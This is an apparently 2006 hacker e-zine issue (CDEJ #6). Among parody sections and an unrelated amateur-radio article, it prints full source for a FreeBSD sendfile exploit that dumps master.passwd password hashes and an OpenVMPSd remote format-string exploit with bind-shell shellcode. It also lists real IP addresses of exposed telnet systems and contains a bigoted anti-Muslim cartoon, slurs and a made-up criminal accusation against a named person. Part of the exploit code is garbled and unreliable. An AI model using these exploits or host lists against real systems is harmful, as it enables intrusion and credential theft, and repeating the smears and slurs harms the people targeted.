*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x *x L'ELEPHANT AVEC LES TRUNKS HUGE *x *x izzue six *x *x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x *x *x *x *x *x ___ __ *x *x / \____ / \ *x *x / / __ \ \ *x *x / | Oo | \ *x *x \___/| |\___/\ *x *x | |_| |_| \ *x *x | |/|__|\| \ *x *x | |__| |\ *x *x | |__| |_/ / \ *x *x | @ | | @ || @ | ' *x *x | |~~| || | *x *x 'ooo' 'ooo''ooo' *x *x *x *x "CDEJ - I love this game" *x *x *x *x *x *x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x cdej.org/cdej.org/cdej.org/cdej.org/cdej.org/cdej.org/cdej.org/cdej.org/cdej. *x*x*x*x*x*x*x*x*x*x*x*x*[ issue #6 14/02]*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x [x]=[000] intro: cdej state of the union address - staff [x] :D? :D? [x]=[001] #cdej@efnet quotes / fanmail - staff [x] :D? :D? [x]=[002] m00.c [this issue's premier 0day] - m00 [x] :D? :D? [x]=[003] a feedline energy analysis - c3c1l 4 m00r3 [x] :D? :D? [x]=[004] strange things found on the internet - fathaqr [x] :D? :D? [x]=[005] what's hot, what's not, a guide to 2006 haqr fashion - longarms [x] :D? :D? [x]=[006] OpenVMPSd Remote Format String Exploit - gotfault security [x] :D? :D? [x]=[007] Sony/Ericsson Bluetooth (Reset Display) DoS - some french fag [x] :D? :D? [x]=[010] eXchange POP3 5.0(rcpt to) Remote BOF - secura massine [x] :D? :D? [x]=[011] guide to making source code virus' using MS - two-twenty [x] *x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x cdej.org/cdej.org/cdej.org/cdej.org/cdej.org/cdej.org/cdej.org/cdej.org/cdej. /efnet/#cdej/efnet/#cdej/efnet/#cdej/efnet/#cdej/efnet/#cdej/efnet/#cdej/efne ASCII ART CARTOON THAT WILL MAKE PEOPLE RIOT! PASS IT ON!! =============================================================== @ O o -_- <(Hello I'm a m*slim! I blow things up! Free Kevin!) o0o0o0o0 phag-> 8D <(Sir as an advocate of peace I suggest that we learn to live in close proximity to one another while respecting each others beliefs.) 
o0o0o0o0 O /\ /\ /\ @ o < k4b3wM!> D -_- \/ \/ \/ 8 o0o0o0o0 @ O o -_- <(Hi I am dead now, can I have my virgins please?) o0o0o0o0 @@@@@@@@@ @@@@@@@@@@@ [b1gturb4n] \ oO / <(I'm the king of dead 4r4bz. Here's \ ---- / the virgin goats we promised!) \ / o0o0o0o0 @ O o -_- <(Yay!) oO <(Baaaaa give me cans to eat!) -- >--- / \ o0o0o0o0 Fin. =============================================================== 000x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*000 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Intro . . . . . . . . . . . . . . . . . . . . . . . . . . . . cdej staff . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 000x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*000 A Letter to Our Troops: With time, it is inevitable that any noble literary persuit will reach a certain level of maturity, if it is to survive amongst equally innovative competition. Gutenberg's invention of the printing press, the Ancient Egyptian discovery of mumification, all long-lasting enterprise are formulated with one goal in mind: survival and improvement of the human race. While economic goals can be cited as short term motivations for labor and research, one must learn to look at economy as a providence of necessity, and not the motivating factor itself. CDEJ has, since last issue, met and surpassed new milestones. We have had our one billionth visit to our website. We've finally been offered a partnership with government cybersecurity agencies. We've been given the opportunity to beta-test Solaris12, Windows 2010RE (Robot Edition), and the 2015 version of the Aibo. In short, we've conquerored and continue to excell. Our rivals are lost somewhere in the massive mushroom cloud of our proverbial 'dust'. The Phrack site has been taken down out of sheer despiration; they simply couldn't match us. 
2600 editor Emmanuel Goldstein (having recently been released from prison on bond for child molestation charges) has continued to send us large amounts of currency in an effort to keep our movement underground. It won't work. CDEJ has risen in the last 6 months as *the* driving force behind the computer underground, and we will continue to achieve, with our readers' support. Send me your 0day, your articles. Chill in #cdej/efnet. Learn and hang out with us, and together we'll grow more elite than our DARPA investors ever imagined possible. - cdej staff 5 star general council elite beyond imagination 001x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*001 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Misc. Nonsense . . . . . . . . . . . . . . . . . . . . . . . . . . cdej staff . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 001x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*001 paste me what you have written so far :/ dude i write with a paper and pen [ TIME PASSES ] krypton send me your article dood i lost my sence of humor in middle of my writing i can finish it then give it to me and i'll finish it and post it under your name :D? cant* dude i wrote it on a paper ======================= :D? :D? :D? :D? :D? :D? ======================= i remember back then when i used to bring hookers to IRC ======================= :D? :D? :D? :D? :D? :D? ======================= http://discharges.org/h/0601/ ======================= :D? :D? :D? :D? :D? :D? ======================= An interesting exerpt from: http://www.coolnerds.com/Newbies/Fear/hackFear/hackfear.htm The above site is highly recommended reading.... In the movies, brilliant good-looking kids [thanks :.)] are able to break into other peoples' computers just by typing some nonsense [to some people, j00nix isn't nonsense! once I meet one, I'll proove it!] 
at a keyboard and luckily guessing a password [actually we just use hydra]. In real life, that's impossible [:D?]. Even if you leave your computer on and connected to the Internet 24 hours a day, 7 days a week [now who in the world would do that? my uptime never goes beyond 30 minutes!], nobody can log into your computer and rummage around through your files [i guess i need to find a new hobby :.(]. Nobody can steal stuff off your hard disk. Such things never happen, because they can't happen, despite what the media tells you. [Are you referring to 'Hackers' the movie?]

[The lunacy continues at http://www.coolnerds.com/Newbies/Fear/hackFear/hackfear.htm ... ]

=======================
:D? :D? :D? :D? :D? :D?
=======================

[#phrack] Banned from channel

FANMAIL

Dear CDEJ:

I'm a single parent trying to survive in today's high tech world of 0day, exploits, DoS botnets, and federal raids. I am interested in protecting my kids (two of whom are old enough to IRC, and one of whom is starting to learn) from haqrs like CHANFIX. Any suggestions?

- Betty

Dear Betty:

Raising a kid on today's IRC networks can be tough.
I suggest you equip them for the 'real world' as early as you can, by teaching them how to use important tools like 7th Sphere and winnuke. The earlier they learn about IRC threats and how they can protect themselves, the better they will be in the long term. - Dr. Longarms ======================= :D? :D? :D? :D? :D? :D? ======================= Dear CDEJ: I am curious, what is the history of CDEJ? - History Channel Dear History Channel: CDEJ zine started when cdej leader longarms invited w01f and trans to create a next-generation haqr zine. w01f and trans knew each other from the roles they played on the MGM film 'Hackers'. You may be amazed to learn that 'razor' and 'blade' were actually trans and w01f! The unique make-up and homofaggot look (created to increase the 'hacker' feel of the movie') was invented by b4b0 members. Special thanks to them! Interesting enough, haqr trans and haqr w0lf had also worked on advanced projects at Bellcore (now telcordia) back in the 1970s! NO MORE FAN MAIL THIS ISSUE, SEND STUFF IN HAQRS 002x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*002 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . m00.c . . . . . . . . . . . . . . . . . . . . . . . . . . . phearfull 0day . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 002x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*002 #include #include #include #include #include #include #include #define MAX_PAS_LEN 128 /* max line length in master.passwd */ #define DUMPSIZE 64 /* mb */ #define MD5_HASH_LEN 34 /* md5 hash lenght */ #define CH 0x41 /**************************************************** !!! m00 private code !!! 
m00-sendfile - FreeBSD master.passwd dump Will make exact copy of master.passwd Tested under FreeBSD 5.2 Should work under FreeBSD <=5.3 && FreeBSD <=4.11 (c)oded by blf 2005 Thanks to kcope for idea Gr33tz: h0snp, rash, ov3r, akula, izik, ares, 1dt.w0lf, BlackPrince, wh, rsh, Inck-Vizitor, camel, whice, rebel, Phoenix http://www.blackhat.ru All rights reserved !!! m00 private code !!! ****************************************************/ u_int counter = 0; short mode; void usage(char *argv) { fprintf(stderr, "Usage: %s 0|1\n\t0 - make full kvm dump\n\t1 - make master.passwd only dump\n", argv); fprintf(stderr, "m00sendfile by blf (c) 2005 m00\n"); exit(-1); } void get_users() { FILE * fd; char line[MAX_PAS_LEN]; if ((fd = fopen("/etc/passwd", "r")) == NULL) // here we get number of users { fprintf(stderr, "[!] Cannot open /etc/passwd file!\n"); exit(-1); } while (fgets(line, MAX_PAS_LEN, fd)) { if(*(line+0) == '#') continue; counter++; } printf("[~] %d users found in master.passwd\n", counter); fclose(fd); } void get_dump(struct sockaddr_in addr) { int sock, client_sock; char line[MAX_PAS_LEN]; char * start = "root:$1$"; int i, j = 0, ok = 0, found = 0; FILE * f, * dump; if(mode) f = fopen("master.passwd", "w"); else dump = fopen("dump", "w"); sock = socket(PF_INET, SOCK_STREAM, 0); if (bind(sock, (struct sockaddr*) &addr, sizeof(addr)) < 0 ) { fprintf(stderr, "[!] 
bind() failed!\n"); exit(1); } listen(sock, 1); client_sock = accept(sock, 0, 0); while(read(client_sock, line, sizeof(line))) { if(found && mode) { if(found == counter) break; /* master.passwd dumped */ fputs(line, f); found++; continue; } for(i = 0; i < sizeof(line); i++) { if(!mode && !ok) { /* in th beginning we have some shit in the file */ if((*(line+i) != CH) && (j/1024/1024) > 1) { printf("[~] kvm found in dump, after reading %d mb\n", j/1024/1024); ok = 1; } } if(*(line+i) == 'r' && mode) { if(strncmp((line+i), start, strlen(start)) == NULL) { if(*(line+i+MD5_HASH_LEN+5) == ':') { printf("[~] root found in dump!\n"); fputs(line+i, f); found = 1; break; } } } j++; } if(!mode && ok) fwrite(line, sizeof(line), 1, dump); } if(mode) { if(!found) printf("[!] master.passwd was not found in dump! Try to run exploit again\n"); else printf("[~] master.passwd was successfuly dumped!\n"); printf("[~] %d user passwords were discovered\n", found); fclose(f); exit(0); } else { if(ok) { printf("[~] %d mb read from dump\n", j/1024/1024); printf("[!] kvm was successfuly dumped!\n"); } else printf("[!] kvm was not found in dump. 
Probably box is patched...\n"); fclose(dump); } } int main(int argc, char ** argv) { int file, mysock, j, i =0; FILE * f; struct sockaddr_in addr; pid_t pid, suid; if(argc < 2) usage(argv[0]); if(strncmp(argv[1], "1", 1) == NULL) { mode = 1; printf("[~] Making master.passwd dump only\n"); } else { mode = 0; printf("[~] Making full kvm dump\n"); } mysock = socket(PF_INET, SOCK_STREAM, 0); bzero(&addr, sizeof(addr)); addr.sin_addr.s_addr = INADDR_ANY; addr.sin_port = htons(9999); addr.sin_family = PF_INET; if(mode) get_users(); f=fopen("/tmp/.shit", "w"); for (i=0; i <= DUMPSIZE * 1024 * 1024; i++) { fputc(CH, f); } fclose(f); file = open("/tmp/.shit", O_RDWR); pid = fork(); if (pid > 0) { sleep(2); /* here we sleep, before connect */ if (connect(mysock, (struct sockaddr*) &addr, sizeof(addr)) == -1) { perror("connect() failed"); return 2; } suid = fork(); if (suid > 0) { if (sendfile (file, mysock, 0, DUMPSIZE * 1024 * 1024, NULL, NULL, 0) == -1) { fprintf(stderr, "[!] sendfile() failed!\n"); exit(-1); } } if(suid == 0) { f=fopen("/tmp/.shit", "w"); fclose(f); /* erase file, to make kernel send it's memory */ for (j = 0; j < 10; j++) system("/usr/bin/chsh -s /bin/sh"); /* call suid, to put master.passwd into kvm */ } } if(pid == 0) { get_dump(addr); } close(file); shutdown(mysock, 2); return 0; } // EOF! 003x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*003 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a feedline energy analysis (reproduced without perms! . . . . . . . . . . . . . . . . c3c1l 4 m00r3 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 003x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*003 Where Does the Power Go? [1] There continue to be many differing responses to the question within the amateur radio community and, so far, no one has presented the facts of the physics of power as understood from the field of optics. 
Those facts from optics have been known and understood for decades and are consistent with the laws of physics and the equations governing the behavior of RF transmission lines. Light and RF waves are both composed of electromagnetic energy. Most of the following information comes from "Optics" [2].

In the field of optics, irradiance is the same thing as power in an RF transmission line if the cross sectional area of the transmission line is taken into account. Irradiance has the dimensions of energy per unit area per unit time. If the light beam of a particular laser occupies the same cross sectional area as a particular coaxial RF transmission line then the irradiance of the laser beam is comparable to the RF power in the transmission line. The 1/4 wavelength thin-film deposited on glass to obtain a non-reflective surface performs in a virtually identical way to a 1/4 wavelength series matching section in a transmission line. Single-source RF energy in a transmission line and laser light are both coherent electromagnetic energy waves that obey the laws of superposition, interference, conservation of energy, and conservation of momentum.

My Historical Perspective

My first memories of the answer to "Where does the power go?" are articles published in QST written by Walter Maxwell, W2DU, some quarter of a century ago. Mr. Maxwell later compiled the information into a book titled, "Reflections", which quickly became the bible for Amateur Radio applications involving stub matching, transmission lines, and forward and reflected energy flow.

Mr. Maxwell coined the terms, "virtual short" and "virtual open", as a shorthand description of what rearward-traveling reflected energy encounters at a match point in a transmission line resulting in 100% re-reflection. He also explained the function of destructive wave interference and constructive wave interference in achieving a match point on a transmission line [8] which is what a large part of this article is about.
Sometime after the publication of Reflections, some people questioned the validity of Mr. Maxwell's concepts. In particular, Dr. Steven Best, VE9SRB, took Mr. Maxwell to task in a series of articles published in QEX [3]. Simply put, Dr. Best disagreed with Mr. Maxwell that reflected power is 100% re-reflected in a matched system.

Before publication of his Part 3 QEX article, Dr. Best sent up trial balloons for his ideas on the usenet newsgroup, rec.radio.amateur.antenna. My opinion was that Dr. Best's future article contained numerous errors which were pointed out to him. However, the article as published still contained the alleged errors.

My determination to resolve the conflicts between the concepts presented by Walter Maxwell and the ones presented by Dr. Best culminated in this present article. The conclusions will be presented first with the technical details to follow in Part II and Part III.

In a nutshell, Walter Maxwell's "virtual short" is a two step process. The reflected wave from the load encounters the impedance discontinuity at the match point. A re-reflection occurs that equals the incident reflected power multiplied by the power reflection coefficient at the match point (the square of the voltage reflection coefficient). This re-reflected energy joins the forward wave traveling toward the load. That first energy re-reflection is not the only energy that joins the forward wave. That fact is what Dr. Best missed in his article. Interference of any kind was never mentioned in Dr. Best's QEX article.

The part of the reflected wave that is not re-reflected is transmitted back through the impedance discontinuity at the match point and attempts to flow toward the source. We know the reflected energy doesn't make it to the source in a matched system, so where does it go? The answer is mentioned in "Reflections II" [8].

What Mr. Maxwell is describing is wave cancellation due to total destructive interference between two reflected waves.
The first wave is the part of the source forward wave that is initially reflected back toward the source from the match point. The second wave is the part of the reflected wave from the load that is transmitted through the match point toward the source. These waves are equal in magnitude and opposite in phase so, as Mr. Maxwell asserts in Reflections II, they cancel to zero at the match point thus eliminating reflections between the match point and the source. The canceling of these two waves to zero is the second step in Mr. Maxwell's virtual short process of 100% reflection.

Voltages can cancel and currents can cancel but energy cannot cancel. What happens to the energy that existed in the waves before they were cancelled? Since we know that all the energy in a matched system winds up flowing toward the load, the answer is a no-brainer. There are only two directions in a transmission line. If energy that was previously flowing toward the source isn't flowing toward the source anymore, it must necessarily be flowing toward the load. The conclusion is inescapable. Not only is 100% of the reflected energy re-reflected at the match point, but wave cancellation is the cause of part of that re-reflection. This is a well understood phenomenon in the field of optics [9] but not well understood in the field of RF engineering.

An RF engineer will usually say there are three things that can cause 100% reflection. Those are a short-circuit, an open-circuit, or a purely reactive impedance. This is true at a load. But at an impedance discontinuity with waves incident from both directions, to that list of three, we can add a fourth, namely wave cancellation due to total destructive interference.

In general: The destructive interference energy resulting from wave cancellation at an impedance discontinuity becomes an equal magnitude of constructive interference in the opposite direction.
Since there are only two directions in a transmission line, wave cancellation is the equivalent of an energy reflection. 100% wave cancellation means 100% energy reflection. [9]

References are included in this Part I of the series and will not be repeated in Parts II and III. In Part II, the general case qualitative analysis will be presented.

I would like to thank Mr. Robert E. Lay, W9DMK, for his substantial contributions to this article.

References

[1] Bloom, Jon, Where Does the Power Go?, "QEX", Dec. 1994

[2] Hecht, Eugene, "Optics", Fourth Edition, (c)Aug. 2001, Addison-Wesley, ISBN 0805385665

[3] Best, Steven R., Wave Mechanics of Transmission Lines, Part 3, "QEX", Nov/Dec 2001

[4] "Interference term", "Optics", Eugene Hecht, Fourth Edition

Section 7.1 The Addition of Waves of the Same Frequency

It follows ... that the resultant flux density is not simply the sum of the component flux densities; there is an additional contribution 2*E01*E02*cos(a2-a1), known as the interference term. ("a" replaces the Greek letter Alpha and INTERFERENCE TERM is emphasized.)

Section 9.1 General Considerations

The 'interference term' becomes I12 = 2*SQRT[(I1)(I2)]*cos(s) [where I is irradiance (power)] ('SQRT' replaces the square root sign and "s" replaces the Greek letter Sigma.)

[5] "S-Parameter Techniques", Hewlett Packard Application Note 95-1, available on the web.

The S-Parameter normalized voltage equations are:

b1 = (s11)(a1) + (s12)(a2) and
b2 = (s21)(a1) + (s22)(a2)

The squares of all those terms are related to power as explained in the application note. It is left as an exercise for the reader to square both sides of both equations above and observe that the resulting equations contain the interference term that agrees with Eq 1 and Eq 2 in the body of this paper.

[6] "Optics", Eugene Hecht, Fourth Edition

Section 3.3 Energy and Momentum, "One of the most significant properties of the electromagnetic wave is that it transports energy and momentum."
[Note from W5DXP: Energy and momentum must be conserved. The direction of the energy and momentum associated with reflected waves must be reversed for a match to occur.]

Section 4.11 Photons, Waves and Probability, "The principle of conservation of energy makes it clear that if there is constructive interference at one point, the 'extra' energy at that location must have come from somewhere else. There must therefore be destructive interference somewhere else.

"If two or more electromagnetic waves arrive at point P out-of-phase and cancel, 'What does that mean as far as their energy is concerned?' Energy can be distributed, but it doesn't cancel out."

Section 7.1 The Addition of Waves of the Same Frequency, "The superposition of coherent waves generally has the effect of altering the spatial distribution of the energy but not the total amount (of energy) present."

[7] "Optics", Eugene Hecht, Fourth Edition

Section 9.1 General Considerations, "A maximum irradiance (power) is obtained when cos(s) = 1. ... In this case of total constructive interference, the phase difference between the two waves is an integer multiple of 2*Pi, and the disturbances are in-phase. ... A minimum irradiance (power) results when the waves are 180 degrees out-of-phase, ... cos(s) = -1, ... and is referred to as total destructive interference." ("s" replaces the Greek letter Sigma and TOTAL DESTRUCTIVE INTERFERENCE is emphasized.)

[8] Maxwell, Walter, "Reflections II", (c) 2001 Worldradio Books, ISBN 0-9705206-0-3

page 4-3, "The destructive wave interference between these two complementary waves ... causes a complete cancellation of energy flow in the direction toward the generator. Conversely, the constructive wave interference produces an energy maximum in the direction toward the load, ..."

page 23-9, "Consequently, all corresponding voltage and current phasors are 180 degrees out of phase at the matching point. ...
With equal magnitudes and opposite phase at the same point (point A, the matching point), the sum of the two (reflected) waves is zero."

[9] Quotes from two web pages from the field of optical engineering:

www.mellesgriot.com/products/optics/oc_2_1.htm

"Clearly, if the wavelength of the incident light and the thickness of the film are such that a phase difference exists between reflections of π, then reflected wavefronts interfere destructively, and overall reflected intensity is a minimum. If the two reflections are of equal amplitude, then this amplitude (and hence intensity) minimum will be zero." (Referring to 1/4 wavelength thin films.)

"In the absence of absorption or scatter, the principle of conservation of energy indicates all 'lost' reflected intensity will appear as enhanced intensity in the transmitted beam. The sum of the reflected and transmitted beam intensities is always equal to the incident intensity. This important fact has been confirmed experimentally."

http://micro.magnet.fsu.edu/primer/java/scienceopticsu/interference/waveinteractions/index.html

"... when two waves of equal amplitude and wavelength that are 180-degrees ... out of phase with each other meet, they are not actually annihilated, ... All of the photon energy present in these waves must somehow be recovered or redistributed in a new direction, according to the law of energy conservation ... Instead, upon meeting, the photons are redistributed to regions that permit constructive interference, so the effect should be considered as a redistribution of light waves and photon energy rather than the spontaneous construction or destruction of light."

Note from W5DXP: In an RF transmission line, since there are only two possible directions, the only "regions that permit constructive interference" at an impedance discontinuity is the opposite direction from the direction of destructive interference.

004x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*004
. . . . . . . . . . . . .
. . . . . . . . . . . . . . . . . . . . . . . . . . . strange things found on the net . . . . . . . . . . . . . . . . . . . . . fathaqr . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 004x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*004 There are strange things on the net, we haven't explored it all yet! Ideas include scanning for open shares with netbios (NBT, TCP port 139), telnet scanning, ssh scanning, and 443 (ssl web) scanning! Here are some telnet's for y'all. Don't do anything bad, or you ruin it for others. You can probably legally telnet and look, but then disconnect! No hacking allowed!! When you're done, go do your own scans and give them to the 31337 people at cdej! Telnet: 70.245.153.150 -- tivo 64.231.141.189 -- tivo 128.82.176.72 -- openvms with cool banner 68.214.24.35 -- funny banner 201.216.201.130 -- linux voicemail system 218.15.101.122 -- videophone configuration 218.103.149.40 -- videophone configuration 72.248.50.62 -- car wash 62.73.186.59 -- MUD 130.232.72.71 -- MUD 212.85.198.9 -- Africa Online (lol) 18.162.0.14 -- tcp/ip and x.25 gateway 195.113.179.124 -- radio link terminal 200.55.130.219 -- radio link terminal 200.55.217.84 -- VoIP gateway system 200.55.130.219 -- multivoip Web: telephreak.org -- free VMB and conf mininova.org -- good torrents http://sat.berlios.de/devel/sat.srules -- good text to identify systems Use this code to find whatever music you want from google: javascript:void(qr=prompt('Slapman%20-%20Music%20Search%20Indexer%20-%20Type%20any%20Music%20or%20Album%20Name:%20',''));if(qr)location.href='http://www3.google.com/search?&num=100&hl=en&ie=UTF-8&oe=UTF-8&btnG=Google+Search&as_epq=parent+directory=&as_oq=mp3+wma+ogg+anonymous&as_eq=module+modules&lr=&as_ft=i&as_filetype=&as_qdr=all&as_occt=any&as_dt=i&as_sitesearch=&safe=images&as_q='+escape(qr);void%201; Use this code to find movies: 
javascript:void(qr=prompt('Movie%20Search%20Indexer%20-%20Type%20any%20Movie%20Name:%20',''));if(qr)location.href='http://www3.google.com/search?&num=100&hl=en&ie=UTF-8&oe=UTF-8&btnG=Google+Search&as_epq=parent+directory=&as_oq=wmv+mpg+mpeg+avi+rm+anonymous&as_eq=module+modules+mp3+porn+sex+xxx+incest+rape&lr=&as_ft=i&as_filetype=&as_qdr=all&as_occt=any&as_dt=i&as_sitesearch=&safe=images&as_q='+escape(qr);void%201; Keep the spirit alive! FatHaqr, CDEJ special agent 005x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*005 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . what's hot, what's not: 2006 haqr fashion . . . . . . . . . . . . . . . . . . . cdej staff . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 005x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*005 Stop living in the 90s. This will get you nowhere. Use this handy chart to decide which of your personal habits need to change if you are ever going to become a cdej-worthy haqr. HOT (2006) NOT (1996) -------------------------------------------- cdej Lo? (? = D, U, etc.) uncombed, long hair dyed hair, cut short clothes that you never change tight clothes, latex d&b, ambient house, trance trans, w01f, longarms eric corley, phiber optik around the world around NYC republican democrat guns being scared of guns silent hill super mario bros opensolaris, linux 2.6 openbsd (theo is a commie) software programmable radio BOF, DoS decrypting GSM getting yer ham license GSM AMPS aibo tamagachi sbc handsets and helmets bellsouth handsets and helments war peace reading watching movies sitting at home defcon running, working out drugs mr. t (mr t. has *always* been pure cdej) cdej.org slashdot.org ASCII ANSI / RIP stock market selling drugs There you have it. If you remember and follow these fashion tips, chances are you will at least look and act like a haqr, even if you have no idea how to use a computer. k.thx! 
006x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*006 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . OpenVMPSd 0day . . . . . . . . . . . . . . . . . . . . . . . . . Gotfault Sec . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 006x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*x*006 /*OpenVMPSd <= 1.3 Remote Format String Exploit (Multiple Targets) 890 -Gotfault Security*/ /* * gexp-openvmpsd.c * * OpenVMPSd v1.3 Remote Format String Exploit * Copyright (C) 2005 Gotfault Security * * Bug found and developed by: barros and xgc * * Original Reference: * http://gotfault.net/research/exploit/gexp-openvmpsd.c * */ #include #include #include #include #include #include #include #include #include #include #include /*==[ Prototypes ]==*/ void Usage(char *); void fatal(char *); int CreateEvilBuffer(int, int, int, int, char *); void ExecuteShell(int); void SendBuffer(int , char *, int); int CreateUdpSocket(void); int ConectToHost(char *, int); /*==[ Defines ]==*/ #define DEFAULT_PORT 1589 // Default server port #define BIND_PORT 31337 // Default port to bind #define NOPSIZE 50 // Do not change this value cause the shellcode space is "limited" #define NOP 0x90 // Nop value #define PAD "..." 
// Format string alignment #define PORT_OFFSET 29 // Offset to fix the shellcode /*==[ Targets ]==*/ struct { char *Name; int Gotaddr; int Retaddr; int Pop; }Targets[] = { "OpenVMPSd v1.3 @ Slackware 10.0", 0x0804e57c, 0xbffff4f5, 19, "OpenVMPSd v1.3 @ Debian 3.0 Linux", 0x0804d0f8, 0xbffff7ac, 29, "OpenVMPSd v1.3 @ Fedora Core 2", 0x0804d0f8, 0xbffff7ac, 19, // Finish 0, 0, 0, 0 }; /*==[ Shellcode by Marco Ivaldi ]==*/ char shellcode[] = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" "\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80" "\x89\xc7\x52\x66\x68" "BP" // Port to bind "\x43\x66\x53\x89\xe1\xb0\x10\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80" "\xb0\x66\xb3\x04\xcd\x80" "\x50\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80" "\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80" "\x41\xe2\xf8\x51\x68n/sh\x68//bi\x89\xe3\x51\x53\x89\xe1\xb0\x0b\xcd\x80"; /*==[ OpenVMPSd UDP packet header ]==*/ #define SIZE_OF_HEADER 14 char header[] = "\x41\x01\x41\x01\x41\x41\x41\x41\x00\x00\x0c\x02"; int main(int argc, char **argv) { extern char *optarg; extern int optind; char opt; char *Host = NULL; int Port = DEFAULT_PORT; int BindPort = BIND_PORT; int TargetNumber = 0; int Sock,i; char *EvilBuffer; int BufLen; fprintf(stdout,"\n--=[ OpenVMPSd Remote Format String Exploit ]\n\n"); // Process arguments while ( (opt = getopt(argc,argv,"h:t:p:r:")) != EOF) { switch(opt) { case 'r': BindPort = atoi(optarg); if(!BindPort) Usage(argv[0]); break; case 'p': Port = atoi(optarg); if(!Port) Usage(argv[0]); break; case 't': TargetNumber = atoi(optarg); break; case 'h': Host = optarg; break; default: Usage(argv[0]); break; } } if(Host == NULL) Usage(argv[0]); // Verify target for(i=0;;i++) if(Targets[i].Name == 0) break; if(--ih_addr,hp->h_length); server.sin_port = htons(Port); s = socket(PF_INET,SOCK_DGRAM,0); if(connect(s,(struct sockaddr *)&server, sizeof(server)) < 0) return(-1); return(s); } int ConectToShell(char *Host,int Port) { struct sockaddr_in server; struct hostent *hp; int s; server.sin_family = 
AF_INET; hp = gethostbyname(Host); if(!hp) return(-1); memcpy(&server.sin_addr,hp->h_addr,hp->h_length); server.sin_port = htons(Port); s = socket(PF_INET,SOCK_STREAM,0); if(connect(s,(struct sockaddr *)&server, sizeof(server)) < 0) return(-1); return(s); } int CreateEvilBuffer(int GOT, int RETADDR, int POP, int BINDTOPORT, char *buffer) { char *nops = malloc(NOPSIZE+1); char *ptr; unsigned short *len; unsigned short *portPtr = (unsigned short *)(shellcode+PORT_OFFSET); // Fix shellcode *portPtr = htons(BINDTOPORT); // Header ptr = buffer; memcpy(ptr,header,12); ptr += SIZE_OF_HEADER; len = (unsigned short *)(buffer + SIZE_OF_HEADER - 2); // Create Nops bzero(nops,NOPSIZE+1); memset(nops,NOP,NOPSIZE); // Create format string attack sprintf(ptr, PAD "%c%c%c%c" "%c%c%c%c" "%%.%dd" "%%%d$hn" "%%.%dd" "%%%d$hn" "%s%s", ((u_long)GOT), ((u_long)GOT >> 8), ((u_long)GOT >> 16), ((u_long)GOT >> 24), ((u_long)GOT+2), (((u_long)GOT+2) >> 8), (((u_long)GOT+2) >> 16), (((u_long)GOT+2) >> 24), ((RETADDR & 0x0000FFFF) - 9 - 63), POP, (((RETADDR & 0xFFFF0000)>>16) + 0x10000 - (RETADDR & 0x0000FFFF)) - 1, POP+1,nops,shellcode); *len = htons(strlen(ptr)); return (strlen(ptr)+14); } #define STDIN 0 #define STDOUT 1 void ExecuteShell(int Sock) { char buffer[1024 * 10]; int count; fd_set readfs; write(Sock,"uname -a;id\n",12); while(1) { FD_ZERO(&readfs); FD_SET(STDIN, &readfs); FD_SET(Sock, &readfs); if(select(Sock + 1, &readfs, NULL, NULL, NULL) > 0) { if(FD_ISSET(STDIN, &readfs)) { if((count = read(STDIN, buffer, 1024)) <= 0) { if(errno == EWOULDBLOCK || errno == EAGAIN) 